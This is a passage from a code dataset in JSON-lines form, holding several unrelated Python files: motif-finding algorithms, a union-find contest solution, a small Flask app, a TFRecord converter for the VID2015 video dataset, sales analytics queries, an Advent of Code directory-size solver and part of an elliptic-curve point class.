dt_st + timedelta(days=6)\n # end_time = int(time.mktime(dt_end.timetuple()))\n\n start_time = int(time.mktime(date(2020, 7, 1).timetuple()))\n end_time = int(time.mktime(date(2020, 7, 5).timetuple()))\n\n comment = Comment(start_time, end_time)\n print(comment.getStats())\n\n if constants.DAYS_LEFT <= 1:\n hour_st = 8\n hour_end = 23\n silent = 3\n\n dates = createPostDates(range(hour_st, hour_end, silent))\n post = Post()\n print(post.post(dates))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"koliankolin/public_vk","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23907981025","text":"from MySeq import MySeq\nfrom MyMotifs import MyMotifs\n\nclass MotifFinding:\n\n def __init__(self, size=8, seqs=None):\n self.motifSize = size\n if seqs is not None:\n self.seqs = seqs\n self.alphabet = seqs[0].alfabeto()\n else:\n self.seqs = []\n\n def __len__(self):\n return len(self.seqs)\n\n def __getitem__(self, n):\n return self.seqs[n]\n\n def seqSize(self, i):\n return len(self.seqs[i])\n\n def readFile(self, fic, t):\n for s in open(fic, \"r\"):\n self.seqs.append(MySeq(s.strip().upper(), t))\n self.alphabet = self.seqs[0].alfabeto()\n\n def createMotifFromIndexes(self, indexes):\n pseqs = []\n for i, ind in enumerate(indexes):\n pseqs.append(MySeq(self.seqs[i][ind:(ind + self.motifSize)], self.seqs[i].tipo))\n return MyMotifs(pseqs)\n\n # SCORES\n\n def score(self, s):\n score = 0\n motif = self.createMotifFromIndexes(s)\n motif.doCounts()\n mat = motif.counts\n for j in range(len(mat[0])):\n maxcol = mat[0][j]\n for i in range(1, len(mat)):\n if mat[i][j] > maxcol:\n maxcol = mat[i][j]\n score += maxcol\n return score\n\n def score_pseudo(self, s):\n score = 0\n motif = self.createMotifFromIndexes(s)\n motif.doCounts()\n mat = motif.counts\n mat = [[mat[lin][col] + 1 for col in range(len(mat[0]))] for lin in range(len(mat))]\n for j in range(len(mat[0])):\n maxcol = mat[0][j]\n for i in range(1, len(mat)):\n if mat[i][j] > maxcol:\n maxcol = mat[i][j]\n score += maxcol\n return score\n\n def 
scoreMult(self, s, no_new_pwm=[]):\n score = 1.0\n motif = self.createMotifFromIndexes(s)\n if no_new_pwm == []:\n motif.createPWM()\n mat = motif.pwm\n else:\n mat = no_new_pwm\n for j in range(len(mat[0])):\n maxcol = mat[0][j]\n for i in range(1, len(mat)):\n if mat[i][j] > maxcol:\n maxcol = mat[i][j]\n score *= maxcol\n return score\n\n # EXHAUSTIVE SEARCH\n\n def nextSol(self, s):\n nextS = [0] * len(s)\n pos = len(s) - 1\n while pos >= 0 and s[pos] == self.seqSize(pos) - self.motifSize:\n pos -= 1\n if pos < 0:\n nextS = None\n else:\n for i in range(pos):\n nextS[i] = s[i]\n nextS[pos] = s[pos] + 1\n for i in range(pos + 1, len(s)):\n nextS[i] = 0\n return nextS\n\n def exhaustiveSearch(self):\n melhorScore = -1\n res = []\n s = [0] * len(self.seqs)\n while s is not None:\n sc = self.score(s)\n if sc > melhorScore:\n melhorScore = sc\n res = s\n s = self.nextSol(s)\n return res\n\n # BRANCH AND BOUND \n\n def nextVertex(self, s):\n res = []\n if len(s) < len(self.seqs): # internal node -> down one level\n for i in range(len(s)):\n res.append(s[i])\n res.append(0)\n else: # bypass\n pos = len(s) - 1\n while pos >= 0 and s[pos] == self.seqSize(pos) - self.motifSize:\n pos -= 1\n if pos < 0:\n res = None # last solution\n else:\n for i in range(pos): res.append(s[i])\n res.append(s[pos] + 1)\n return res\n\n def bypass(self, s):\n res = []\n pos = len(s) - 1\n while pos >= 0 and s[pos] == self.seqSize(pos) - self.motifSize:\n pos -= 1\n if pos < 0:\n res = None\n else:\n for i in range(pos): res.append(s[i])\n res.append(s[pos] + 1)\n return res\n\n def branchAndBound(self):\n melhorScore = -1\n melhorMotif = None\n size = len(self.seqs)\n s = [0] * size\n while s is not None:\n if len(s) < size:\n optimScore = self.score(s) + (size - len(s)) * self.motifSize\n if optimScore < melhorScore:\n s = self.bypass(s)\n else:\n s = self.nextVertex(s)\n else:\n sc = self.score(s)\n if sc > melhorScore:\n melhorScore = sc\n melhorMotif = s\n s = self.nextVertex(s)\n return melhorMotif\n\n # Consensus (heuristic)\n\n def heuristicConsensus(self):\n mf = MotifFinding(self.motifSize, self.seqs[:2])\n s = mf.exhaustiveSearch()\n for i in range(2, len(self.seqs)):\n s.append(0)\n melhorScore = -1\n melhorPosicao = 0\n for j in range(self.seqSize(i) - self.motifSize + 1):\n s[i] = j\n score_atual = self.score(s)\n if score_atual > melhorScore:\n melhorScore = score_atual\n melhorPosicao = j\n s[i] = melhorPosicao\n return s\n\n # Consensus (heuristic)\n\n def heuristicStochastic(self):\n from random import randint\n s = [0] * len(self.seqs)\n for i in range(len(self.seqs)):\n s[i] = randint(0, self.seqSize(i) - self.motifSize)\n\n best_score = self.score(s)\n improve = True\n while improve:\n motif = self.createMotifFromIndexes(s)\n motif.createPWM()\n for i in range(len(self.seqs)):\n s[i] = motif.mostProbableSeq(self.seqs[i])\n scr = self.score(s)\n if scr > best_score:\n best_score = scr\n else:\n improve = False\n return s\n\n def heuristicStochastic_ex(self):\n from random import randint\n s = [0] * len(self.seqs)\n for i in range(len(self.seqs)):\n s[i] = randint(0, self.seqSize(i) - self.motifSize)\n\n best_score = self.score_pseudo(s)\n improve = True\n while improve:\n motif = self.createMotifFromIndexes(s)\n motif.createPWM()\n motif.pwm = [[motif.pwm[lin][col] + 0.1 for col in range(len(motif.pwm[0]))] for lin in range(len(motif.pwm))]\n for i in range(len(self.seqs)):\n s[i] = motif.mostProbableSeq(self.seqs[i])\n scr = self.score_pseudo(s)\n if scr > best_score:\n best_score = scr\n 
else:\n improve = False\n return s\n\n # Gibbs sampling \n\n def gibbs(self, iterations=1000):\n from random import randint\n s = [randint(0, len(self.seqs[i]) - self.motifSize - 1) for i in range(len(self.seqs))]\n best_score = self.score(s)\n bests = list(s)\n for it in range(iterations):\n seq_index = randint(0, len(self.seqs) - 1)\n seq = self.seqs[seq_index]\n s.pop(seq_index)\n removed = self.seqs.pop(seq_index)\n motif = self.createMotifFromIndexes(s)\n motif.createPWM()\n self.seqs.insert(seq_index, removed)\n r = motif.probAllPositions(seq)\n pos = self.roulette(r)\n s.insert(seq_index, pos)\n score = self.score(s)\n if score > best_score:\n best_score = score\n bests = list(s)\n return bests\n\n def gibbs_ex(self, iterations=1000):\n from random import randint\n s = [randint(0, len(self.seqs[i]) - self.motifSize - 1) for i in range(len(self.seqs))]\n best_score = self.score_pseudo(s)\n bests = list(s)\n for it in range(iterations):\n seq_index = randint(0, len(self.seqs) - 1)\n seq = self.seqs[seq_index]\n s.pop(seq_index)\n removed = self.seqs.pop(seq_index)\n motif = self.createMotifFromIndexes(s)\n motif.createPWM()\n motif.pwm = [[motif.pwm[lin][col] + 0.1 for col in range(len(motif.pwm[0]))] for lin in range(len(motif.pwm))]\n self.seqs.insert(seq_index, removed) # vai voltar a adicionar a seq removida à lista de seqs na posição seq_index\n r = motif.probAllPositions(seq)\n pos = self.roulette(r)\n s.insert(seq_index, pos)\n score = self.score_pseudo(s)\n if score > best_score:\n best_score = score\n bests = list(s)\n return bests\n\n def roulette(self, f):\n from random import random\n tot = 0.0\n for x in f: tot += (0.01 + x)\n val = random() * tot\n acum = 0.0\n ind = 0\n while acum < val:\n acum += (f[ind] + 0.01)\n ind += 1\n return ind - 1\n\n\n# tests\ndef test1():\n sm = MotifFinding()\n sm.readFile(\"exemploMotifs.txt\", \"dna\")\n sol = [25, 20, 2, 55, 59]\n sa = sm.score(sol)\n print(sm.score_pseudo(sol))\n print(sa)\n scm = sm.scoreMult(sol)\n print(scm)\n\n\ndef test2():\n print(\"Test exhaustive:\")\n seq1 = MySeq(\"ATAGAGCTGA\", \"dna\")\n seq2 = MySeq(\"ACGTAGATGA\", \"dna\")\n seq3 = MySeq(\"AAGATAGGGG\", \"dna\")\n mf = MotifFinding(3, [seq1, seq2, seq3])\n sol = mf.exhaustiveSearch()\n print(\"Solution\", sol)\n print(\"Score: \", mf.score(sol))\n print(\"Consensus:\", mf.createMotifFromIndexes(sol).consensus())\n\n print(\"Branch and Bound:\")\n sol2 = mf.branchAndBound()\n print(\"Solution: \", sol2)\n print(\"Score:\", mf.score(sol2))\n print(\"Consensus:\", mf.createMotifFromIndexes(sol2).consensus())\n\n print(\"Heuristic consensus: \")\n sol1 = mf.heuristicConsensus()\n print(\"Solution: \", sol1)\n print(\"Score:\", mf.score(sol1))\n\n\ndef test3():\n mf = MotifFinding()\n mf.readFile(\"exemploMotifs.txt\", \"dna\")\n print(\"Branch and Bound:\")\n sol = mf.branchAndBound()\n print(\"Solution: \", sol)\n print(\"Score:\", mf.score(sol))\n print(\"Consensus:\", mf.createMotifFromIndexes(sol).consensus())\n\n\ndef test4():\n mf = MotifFinding()\n mf.readFile(\"exemploMotifs.txt\", \"dna\")\n print(\"Heuristic stochastic\")\n sol = mf.heuristicStochastic()\n print(\"Solution: \", sol)\n print(\"Score:\", mf.score(sol))\n print(mf.score_pseudo(sol))\n print(\"Score mult:\", mf.scoreMult(sol))\n print(\"Consensus:\", mf.createMotifFromIndexes(sol).consensus())\n sol2 = mf.gibbs(1000)\n print(\"Score:\", mf.score(sol2))\n print(\"Score mult:\", 
mf.scoreMult(sol2))\n\n\ntest1()\nprint()\ntest2()\nprint()\ntest3()\nprint()\ntest4()\n","repo_name":"mpereira19/AAB","sub_path":"MotifFinding.py","file_name":"MotifFinding.py","file_ext":"py","file_size_in_byte":10550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14217062259","text":"# from __future__ import annotations\nfrom typing import List,Union\nimport sys\ninput = sys.stdin.readline\n# from collections import defaultdict,deque\n# from itertools import permutations,combinations\n# from bisect import bisect_left,bisect_right\n# import heapq\n# sys.setrecursionlimit(10**5)\n\nclass UnionFind():\n def __init__(self, N:int):\n self.par = [-1] * N\n self.size = [1] * N\n\n def root(self, x:int):\n \"\"\"\n 頂点xの根を返す\n 通った頂点は直接根につなぐ\n \"\"\"\n if self.par[x] == -1: return x\n self.par[x] = self.root(self.par[x])\n self.size[x] = 1\n return self.par[x]\n\n def unite(self, x:int, y:int):\n \"\"\"\n xを含むグループとyを含むグループを併合\n その際、サイズの大きい方を根とする\n \"\"\"\n rx, ry = self.root(x), self.root(y)\n if rx == ry: return 0\n size_x = self.size[rx]\n size_y = self.size[ry]\n if self.size[rx] >= self.size[ry]:\n self.par[ry] = rx\n self.size[rx] += self.size[ry]\n else:\n self.par[rx] = ry\n self.size[ry] += self.size[rx]\n return size_x * size_y\n\n\ndef main():\n N,M = map(int, input().split())\n AB = [tuple(map(lambda x:int(x)-1, input().split())) for _ in range(M)]\n ans = []\n now = N*(N-1)//2\n group = UnionFind(N)\n for i in range(M)[::-1]:\n a,b = AB[i]\n ans.append(now)\n now -= group.unite(a,b)\n\n for a in ans[::-1]:\n print(a)\n\n\nif __name__ == '__main__':\n main()","repo_name":"tokuD/atcoder","sub_path":"Practice/087.py","file_name":"087.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1699408280","text":"import sys\nsys.path.append('.')\nsys.path.append('..')\n\nimport argparse\n\nfrom flask import Flask, render_template\nimport os\nimport yaml \nfrom utils.config import Config\n\nPEOPLE_FOLDER = os.path.join('static')\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = PEOPLE_FOLDER\n\n@app.route('/')\n@app.route('/index')\n\ndef show_index():\n full_filename = os.path.join(app.config['UPLOAD_FOLDER'], 'last.jpeg')\n return render_template(\"index.html\", user_image = full_filename)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', default='config.yaml', help='Configuration')\n args = parser.parse_args()\n config = Config(yaml.load(open(args.config, 'r'), Loader=yaml.Loader))\n\n port = int(os.environ.get('PORT', config.APP.PORT))\n app.run(port = port, debug = True, use_reloader = False)\n\n","repo_name":"nero1342/Innoworks2021-APCSK18","sub_path":"services/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27919688133","text":"import os\nimport io\nimport glob\nimport math\nimport hashlib\nimport logging\nimport tf_detectors.utils.dataset_util as dataset_util\nimport tensorflow as tf\n\nfrom lxml import etree\nfrom PIL import Image\n\n\"\"\"\nUsage : python vid_2015_to_tfrecord.py \\\n --root_dir=/path/to/VID2015_dataset/ILSVRC \\\n --output_path=/tmp/vid2015_tfrecord\n\nXML format(example):\n\n ILSVRC2015_VID_train_0000/ILSVRC2015_train_00005009\n 000008\n \n ILSVRC_2015\n \n \n 1280\n 576\n \n \n 0\n n02084071\n \n 976\n 675\n 451\n 
115\n \n 0\n 0\n \n\n\"\"\"\n\nflags = tf.app.flags\nflags.DEFINE_string('root_dir', '', 'Root directory to raw VID 2015 dataset.')\nflags.DEFINE_string('set', 'train', 'Convert training set, validation set.')\nflags.DEFINE_string('output_path', './data/VID2015', 'Path to output TFRecord')\nflags.DEFINE_integer('start_shard', 0, 'Start index of TFRcord files')\nflags.DEFINE_integer('num_shards', 10, 'The number of TFRcord files')\nflags.DEFINE_integer('num_frames', 10, 'The number of frame to use')\nflags.DEFINE_integer('num_examples', -1, 'The number of video to convert to TFRecord file')\nFLAGS = flags.FLAGS\n\nSETS = ['train', 'val', 'test']\nMAX_INTERVAL = 5\n\ndef sample_frames(xml_files):\n samples_size = (len(xml_files) - 1) // FLAGS.num_frames + 1\n samples = []\n for s in range(samples_size):\n start = FLAGS.num_frames * s\n end = FLAGS.num_frames * (s+1)\n sample = xml_files[start:end]\n while len(sample) < FLAGS.num_frames:\n sample.append(sample[-1])\n samples.append(sample)\n return samples\n\ndef gen_shard(examples_list, annotations_dir, out_filename,\n root_dir, _set):\n writer = tf.python_io.TFRecordWriter(out_filename)\n for indx, example in enumerate(examples_list):\n ## sample frames\n xml_pattern = os.path.join(annotations_dir, example + '/*.xml')\n xml_files = sorted(glob.glob(xml_pattern))\n samples = sample_frames(xml_files)\n for sample in samples:\n dicts = []\n for xml_file in sample:\n ## process per single xml\n with tf.gfile.GFile(xml_file, 'r') as fid:\n xml_str = fid.read()\n xml = etree.fromstring(xml_str)\n dic = dataset_util.recursive_parse_xml_to_dict(xml)['annotation']\n dicts.append(dic)\n tf_example = dicts_to_tf_example(dicts, root_dir, _set)\n writer.write(tf_example.SerializeToString())\n writer.close()\n return\n\ndef dicts_to_tf_example(dicts, root_dir, _set):\n \"\"\" Convert XML derived dict to tf.Example proto.\n \"\"\"\n # Non sequential data\n folder = dicts[0]['folder']\n filenames = [dic['filename'] for dic in dicts]\n height = int(dicts[0]['size']['height'])\n width = int(dicts[0]['size']['width'])\n\n# # Get image paths\n imgs_dir = os.path.join(root_dir,\n 'Data/VID/{}'.format(_set),\n folder)\n imgs_path = sorted([os.path.join(imgs_dir, filename) + '.JPEG'\n for filename in filenames])\n #glob.glob(imgs_dir + '/*.JPEG'))\n\n # Frames Info (image)\n filenames = []\n encodeds = []\n sources = []\n keys = []\n formats = []\n # Frames Info (objects)\n xmins, ymins = [], []\n xmaxs, ymaxs = [], []\n names = []\n occludeds = []\n generateds = []\n\n # Iterate frames\n for data, img_path in zip(dicts, imgs_path):\n ## open single frame\n with tf.gfile.FastGFile(img_path, 'rb') as fid:\n encoded_jpg = fid.read()\n encoded_jpg_io = io.BytesIO(encoded_jpg)\n image = Image.open(encoded_jpg_io)\n if image.format != 'JPEG':\n raise ValueError('Image format not JPEG')\n key = hashlib.sha256(encoded_jpg).hexdigest()\n\n ## validation\n assert int(data['size']['height']) == height\n assert int(data['size']['width']) == width\n\n ## iterate objects\n xmin, ymin = [], []\n xmax, ymax = [], []\n name = []\n occluded = []\n generated = []\n if 'object' in data:\n for obj in data['object']:\n xmin.append(float(obj['bndbox']['xmin']) / width)\n ymin.append(float(obj['bndbox']['ymin']) / height)\n xmax.append(float(obj['bndbox']['xmax']) / width)\n ymax.append(float(obj['bndbox']['ymax']) / height)\n name.append(obj['name'].encode('utf8'))\n occluded.append(int(obj['occluded']))\n generated.append(int(obj['generated']))\n else:\n xmin.append(float(-1))\n 
ymin.append(float(-1))\n xmax.append(float(-1))\n ymax.append(float(-1))\n name.append('NoObject'.encode('utf8'))\n occluded.append(0)\n generated.append(0)\n\n ## append tf_feature to list\n filenames.append(dataset_util.bytes_feature(data['filename'].encode('utf8')))\n encodeds.append(dataset_util.bytes_feature(encoded_jpg))\n sources.append(dataset_util.bytes_feature(data['source']['database'].encode('utf8')))\n keys.append(dataset_util.bytes_feature(key.encode('utf8')))\n formats.append(dataset_util.bytes_feature('jpeg'.encode('utf8')))\n xmins.append(dataset_util.float_list_feature(xmin))\n ymins.append(dataset_util.float_list_feature(ymin))\n xmaxs.append(dataset_util.float_list_feature(xmax))\n ymaxs.append(dataset_util.float_list_feature(ymax))\n names.append(dataset_util.bytes_list_feature(name))\n occludeds.append(dataset_util.int64_list_feature(occluded))\n generateds.append(dataset_util.int64_list_feature(generated))\n\n # Non sequential features\n context = tf.train.Features(feature={\n 'video/folder': dataset_util.bytes_feature(folder.encode('utf8')),\n 'video/frame_number': dataset_util.int64_feature(len(imgs_path)),\n 'video/height': dataset_util.int64_feature(height),\n 'video/width': dataset_util.int64_feature(width),\n })\n # Sequential features\n tf_feature_lists = {\n 'image/filename': tf.train.FeatureList(feature=filenames),\n 'image/encoded': tf.train.FeatureList(feature=encodeds),\n 'image/sources': tf.train.FeatureList(feature=sources),\n 'image/key/sha256': tf.train.FeatureList(feature=keys),\n 'image/format': tf.train.FeatureList(feature=formats),\n 'image/object/bbox/xmin': tf.train.FeatureList(feature=xmins),\n 'image/object/bbox/xmax': tf.train.FeatureList(feature=xmaxs),\n 'image/object/bbox/ymin': tf.train.FeatureList(feature=ymins),\n 'image/object/bbox/ymax': tf.train.FeatureList(feature=ymaxs),\n 'image/object/name': tf.train.FeatureList(feature=names),\n 'image/object/occluded': tf.train.FeatureList(feature=occludeds),\n 'image/object/generated': tf.train.FeatureList(feature=generateds),\n }\n feature_lists = tf.train.FeatureLists(feature_list=tf_feature_lists)\n # Make single sequence example\n tf_example = tf.train.SequenceExample(context=context, feature_lists=feature_lists)\n return tf_example\n\ndef main(_):\n root_dir = FLAGS.root_dir\n\n if FLAGS.set not in SETS:\n raise ValueError('set must be in : {}'.format(SETS))\n\n # Read Example list files\n logging.info('Reading from VID 2015 dataset. 
({})'.format(root_dir))\n list_file_pattern = 'ImageSets/VID/{}*.txt'.format(FLAGS.set)\n examples_paths = sorted(glob.glob(os.path.join(root_dir, list_file_pattern)))\n examples_list = []\n for examples_path in examples_paths:\n examples_list.extend(dataset_util.read_examples_list(examples_path))\n if FLAGS.num_examples > 0:\n examples_list = examples_list[:FLAGS.num_examples]\n\n # Sharding\n start_shard = FLAGS.start_shard\n num_shards = FLAGS.num_shards\n num_digits = math.ceil(math.log10(max(num_shards-1,2)))\n shard_format = '%0'+ ('%d'%num_digits) + 'd'\n examples_per_shard = int(math.ceil(len(examples_list)/float(num_shards)))\n annotations_dir = os.path.join(root_dir,\n 'Annotations/VID/{}'.format(FLAGS.set))\n # Generate each shard\n for i in range(start_shard, num_shards):\n start = i * examples_per_shard\n end = (i+1) * examples_per_shard\n out_filename = os.path.join(FLAGS.output_path,\n 'VID_2015-'+(shard_format % i)+'.tfrecord')\n if os.path.isfile(out_filename): # Don't recreate data if restarting\n continue\n print('{} of {} [{}:{}] {}'.format(i, num_shards, start, end, out_filename))\n gen_shard(examples_list[start:end], annotations_dir, out_filename,\n root_dir, FLAGS.set)\n return\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"wakanda-ai/tf-detectors","sub_path":"datasets/VID2015/vid_2015_to_tfrecord.py","file_name":"vid_2015_to_tfrecord.py","file_ext":"py","file_size_in_byte":9197,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"38241826174","text":"#! /usr/bin/env python\n\nimport sys\nimport re \nimport csv\nimport MySQLdb as mdb\nimport pandas as pd\nfrom openpyxl import load_workbook\nimport time\nimport collections\nfrom simple_salesforce import Salesforce\n\nsys.path.insert(0,'/home/analytics/analytics_sandbox/python_libs');\nsys.path.insert(0,'/home/analytics/analytics_sandbox/FY14/sales');\nfrom common_libs import *\nfrom create_mysql import *\nfrom attask_libs import * \nfrom attask_api import StreamClient, ObjCode, AtTaskObject\n\ncur_datetime = datetime.now()\nexecfile('/home/analytics/analytics_sandbox/python_libs/stuff.py')\n\npd.set_option('display.width',1000)\npd.set_option('display.max_colwidth',200)\npd.set_option('display.max_rows',400)\n\nDBNAME = \"benchmark_prod\"\n\ncon = None\ncon = mdb.connect('localhost','root','','');\ncur = con.cursor()\n\nquery_group = []\nquery_group.append('AutoSpark')\nquery_group.append('AE')\nquery_group.append('AE (Templa')\nquery_group.append('PPT')\n\ncur_week = (cur_datetime - timedelta(days=1)).date()\n\n#### Top-10 by MKTG effectiveness\nquery = \"SELECT account_id,account_name,yearweek,industry_name,Nvideo,Nparent as Nview,Nuser,USER_reach,BEEs,AVG_target_audience \\\n\t\t\tFROM %s.AER_REACH_SUMMARY_DATEINTERVAL_WEEKLY_account \\\n\t\t\tWHERE yearweek = '%s' and BEEs > 1 ORDER BY USER_reach desc\" % (DBNAME,cur_week)\n\nquery = query.replace('\\t','');\ntop10_mktg_effectiveness_df = createDF_from_MYSQL_query(query)\ntop10_mktg_effectiveness_df = top10_mktg_effectiveness_df.rename(columns={'USER_reach':'MKTG Effectiveness'})\n \n#### Top-10 by Nuser\nquery = \"SELECT account_id,account_name,yearweek,industry_name,Nvideo,Nparent as Nview,Nuser,USER_reach,BEEs,AVG_target_audience \\\n\t\t\tFROM %s.AER_REACH_SUMMARY_DATEINTERVAL_WEEKLY_account \\\n\t\t\tWHERE yearweek = '%s' and BEEs > 1 ORDER BY Nuser desc\" % (DBNAME,cur_week)\n\nquery = query.replace('\\t','');\ntop10_Nuser_df = createDF_from_MYSQL_query(query)\ntop10_Nuser_df = 
top10_Nuser_df.rename(columns={'USER_reach':'MKTG Effectiveness'})\n \ncolumns = ['account_id','account_name','yearweek','industry_name', \\\n\t\t\t'Nvideo','Nview','Nuser','MKTG Effectiveness','BEEs','AVG_target_audience']\nspecial_format= {}\nspecial_format['MKTG Effectiveness'] = \"0.0%\" \ncreateXLSX('./output/top10_weekly','Top 10 MKTG Effectiveness',columns,special_format,top10_mktg_effectiveness_df[0:11],True)\ncreateXLSX('./output/top10_weekly','Top 10 Nuser',columns,special_format,top10_Nuser_df[0:11],False)\n\nexecfile('email_attachment_top10.py')\n","repo_name":"djohnsonguidespark/gs-datascience-sandbox","sub_path":"top10/top10_weekly_tracking.py","file_name":"top10_weekly_tracking.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35335784289","text":"# https://adventofcode.com/2022/day/7\n\nfrom itertools import chain\n\nclass Node:\n def __init__(self, name, parent=None, size=0):\n self.name = name\n self.parent = parent\n self.size = size\n self.children = []\n\n def tally(self):\n if self.children: \n self.size = sum(c.tally() for c in self.children)\n return self.size\n\n def sizes(self):\n yield from chain.from_iterable(\n c.sizes()\n for c in self.children\n if c.children\n )\n yield self.size\n\ndef parse_root(raw):\n curr = root = Node('/')\n for line in raw:\n if line == '$ cd /': continue\n elif line.startswith('$ cd '): \n dst = line[5:]\n curr = (\n curr.parent \n if dst == '..' else \n next(c for c in curr.children if c.name == dst)\n )\n else:\n a, b = line.split()\n if a == 'dir' : curr.children += Node(b, curr),\n if a.isdigit(): curr.children += Node(b, curr, int(a)),\n root.tally()\n return root\n\ndef fst_star(root): \n return sum(filter(lambda x: x <= 100000, root.sizes()))\n\ndef snd_star(root):\n target = root.size - 40000000\n return min(filter(lambda x: x >= target, root.sizes()))\n\nTEST = '''\\\n$ cd /\n$ ls\ndir a\n14848514 b.txt\n8504156 c.dat\ndir d\n$ cd a\n$ ls\ndir e\n29116 f\n2557 g\n62596 h.lst\n$ cd e\n$ ls\n584 i\n$ cd ..\n$ cd ..\n$ cd d\n$ ls\n4060174 j\n8033020 d.log\n5626152 d.ext\n7214296 k'''.splitlines()\n\nif __name__ == '__main__':\n root = parse_root(TEST)\n assert fst_star(root) == 95437\n assert snd_star(root) == 24933642\n\n root = parse_root(open('data/day07.in').read().splitlines())\n print(fst_star(root))\n print(snd_star(root))","repo_name":"andy1li/adventofcode","sub_path":"2022/day07_dirs.py","file_name":"day07_dirs.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33022467588","text":"from samson.math.symbols import Symbol\nfrom samson.math.algebra.rings.ring import Ring, RingElement\nfrom samson.math.polynomial import Polynomial\nfrom samson.math.factorization.general import factor, is_perfect_power\nfrom samson.math.algebra.curves.util import EllipticCurveCardAlg\nfrom samson.math.general import mod_inv, schoofs_algorithm, gcd, hasse_frobenius_trace_interval, sieve_of_eratosthenes, product, crt, is_prime, kth_root, batch_inv, lcm, frobenius_trace_mod_l, legendre, cornacchias_algorithm, hilbert_class_polynomial, random_int, random_int_between, find_prime, primes, cyclomotic_polynomial\nfrom samson.math.discrete_logarithm import pohlig_hellman\nfrom samson.math.map import Map\nfrom samson.utilities.exceptions import NoSolutionException, SearchspaceExhaustedException, CoercionException\nfrom samson.utilities.runtime 
import RUNTIME\nfrom typing import Tuple\nimport math\n\nfrom samson.auxiliary.lazy_loader import LazyLoader\n_elliptic_curve_isogeny = LazyLoader('_elliptic_curve_isogeny', globals(), 'samson.math.algebra.curves.elliptic_curve_isogeny')\n\n\ndef _get_possible_traces_for_D(D, N):\n sols = []\n try:\n sols.extend([t for t,_ in cornacchias_algorithm(abs(D), 4*N, use_hensel=True, all_sols=True)])\n except NoSolutionException:\n pass\n\n try:\n sols.extend([t*2 for t,_ in cornacchias_algorithm(abs(D), N, use_hensel=True, all_sols=True)])\n except NoSolutionException:\n pass\n\n if not sols:\n raise NoSolutionException\n \n return sols\n\n\n_D_MAP = [11, 19, 43, 67, 163, 27, 35, 51, 91, 115, 123, 187, 235, 267, 403, 427]\n\n\nclass WeierstrassPoint(RingElement):\n \"\"\"\n Point on a Weierstrass curve.\n \"\"\"\n\n def __init__(self, x: RingElement, y: RingElement, curve: 'WeierstrassCurve', z: RingElement=None):\n self._x = curve.ring.coerce(x)\n self._y = curve.ring.coerce(y)\n self._z = curve.ring.coerce(curve.ring.one if z is None else z)\n self.curve = curve\n self.order_cache = None\n\n\n def __reprdir__(self):\n return ['x', 'y', 'curve']\n\n\n def __getitem__(self, idx):\n return [self.x, self.y, self.z][idx]\n\n\n def shorthand(self) -> str:\n return f'{self.curve.shorthand()}({{x={self.x}, y={self.y}}})'\n\n\n def tinyhand(self) -> str:\n return f'({self.x} : {self.y} : {self.z})'\n\n\n @property\n def ring(self):\n return self.curve\n\n\n @property\n def val(self):\n return self.x\n\n\n def _collapse_coords(self):\n if self._z and self._z != self._x.ring.one:\n z_inv = ~self._z\n self._x *= z_inv\n self._y *= z_inv\n self._z = self._x.ring.one\n\n\n @property\n def x(self):\n self._collapse_coords()\n return self._x\n\n @property\n def y(self):\n self._collapse_coords()\n return self._y\n\n @property\n def z(self):\n self._collapse_coords()\n return self._z\n\n\n def __hash__(self):\n return hash((self.curve, self.x, self.y))\n\n\n def __int__(self) -> int:\n return int(self.x)\n \n\n def __elemmul__(self, other: 'RingElement') -> 'RingElement':\n raise ValueError('Elliptic curves do not have element multiplication')\n\n\n def fast_compare_x(self, P2: 'WeierstrassPoint') -> bool:\n return P2._x*self._z == self._x*P2._z\n\n\n def fast_compare_y(self, P2: 'WeierstrassPoint') -> bool:\n return P2._y*self._z == self._y*P2._z\n\n def __eq__(self, P2: 'WeierstrassPoint') -> bool:\n return self.curve == P2.curve and self.fast_compare_x(P2) and self.fast_compare_y(P2)\n\n\n def __lt__(self, other: 'WeierstrassPoint') -> bool:\n other = self.ring.coerce(other)\n if self.ring != other.ring:\n raise ValueError(\"Cannot compare elements with different underlying rings.\")\n \n X1, Z1 = self._x, self._z\n X2, Z2 = other._x, other._z\n V1 = X2*Z1\n V2 = X1*Z2\n\n return V2 < V1\n\n\n def __gt__(self, other: 'WeierstrassPoint') -> bool:\n other = self.ring.coerce(other)\n if self.ring != other.ring:\n raise ValueError(\"Cannot compare elements with different underlying rings.\")\n\n X1, Z1 = self._x, self._z\n X2, Z2 = other._x, other._z\n V1 = X2*Z1\n V2 = X1*Z2\n\n return V2 > V1\n\n\n def __neg__(self) -> 'WeierstrassPoint':\n return WeierstrassPoint(self._x, -self._y, self.curve, self._z)\n\n\n def __double(self):\n if not self._y:\n return self.curve.POINT_AT_INFINITY\n\n X, Y, Z = self._x, self._y, self._z\n W = self.curve.a*(Z*Z) + (X*X)*3\n S = Y*Z\n B = X*Y*S\n B4 = B*4\n H = W*W - B4*2\n X_ = H*S*2\n S2 = S*S*8\n Y_ = W*(B4 - H) - (Y*Y)*S2\n Z_ = S*S2\n\n return WeierstrassPoint(x=X_, 
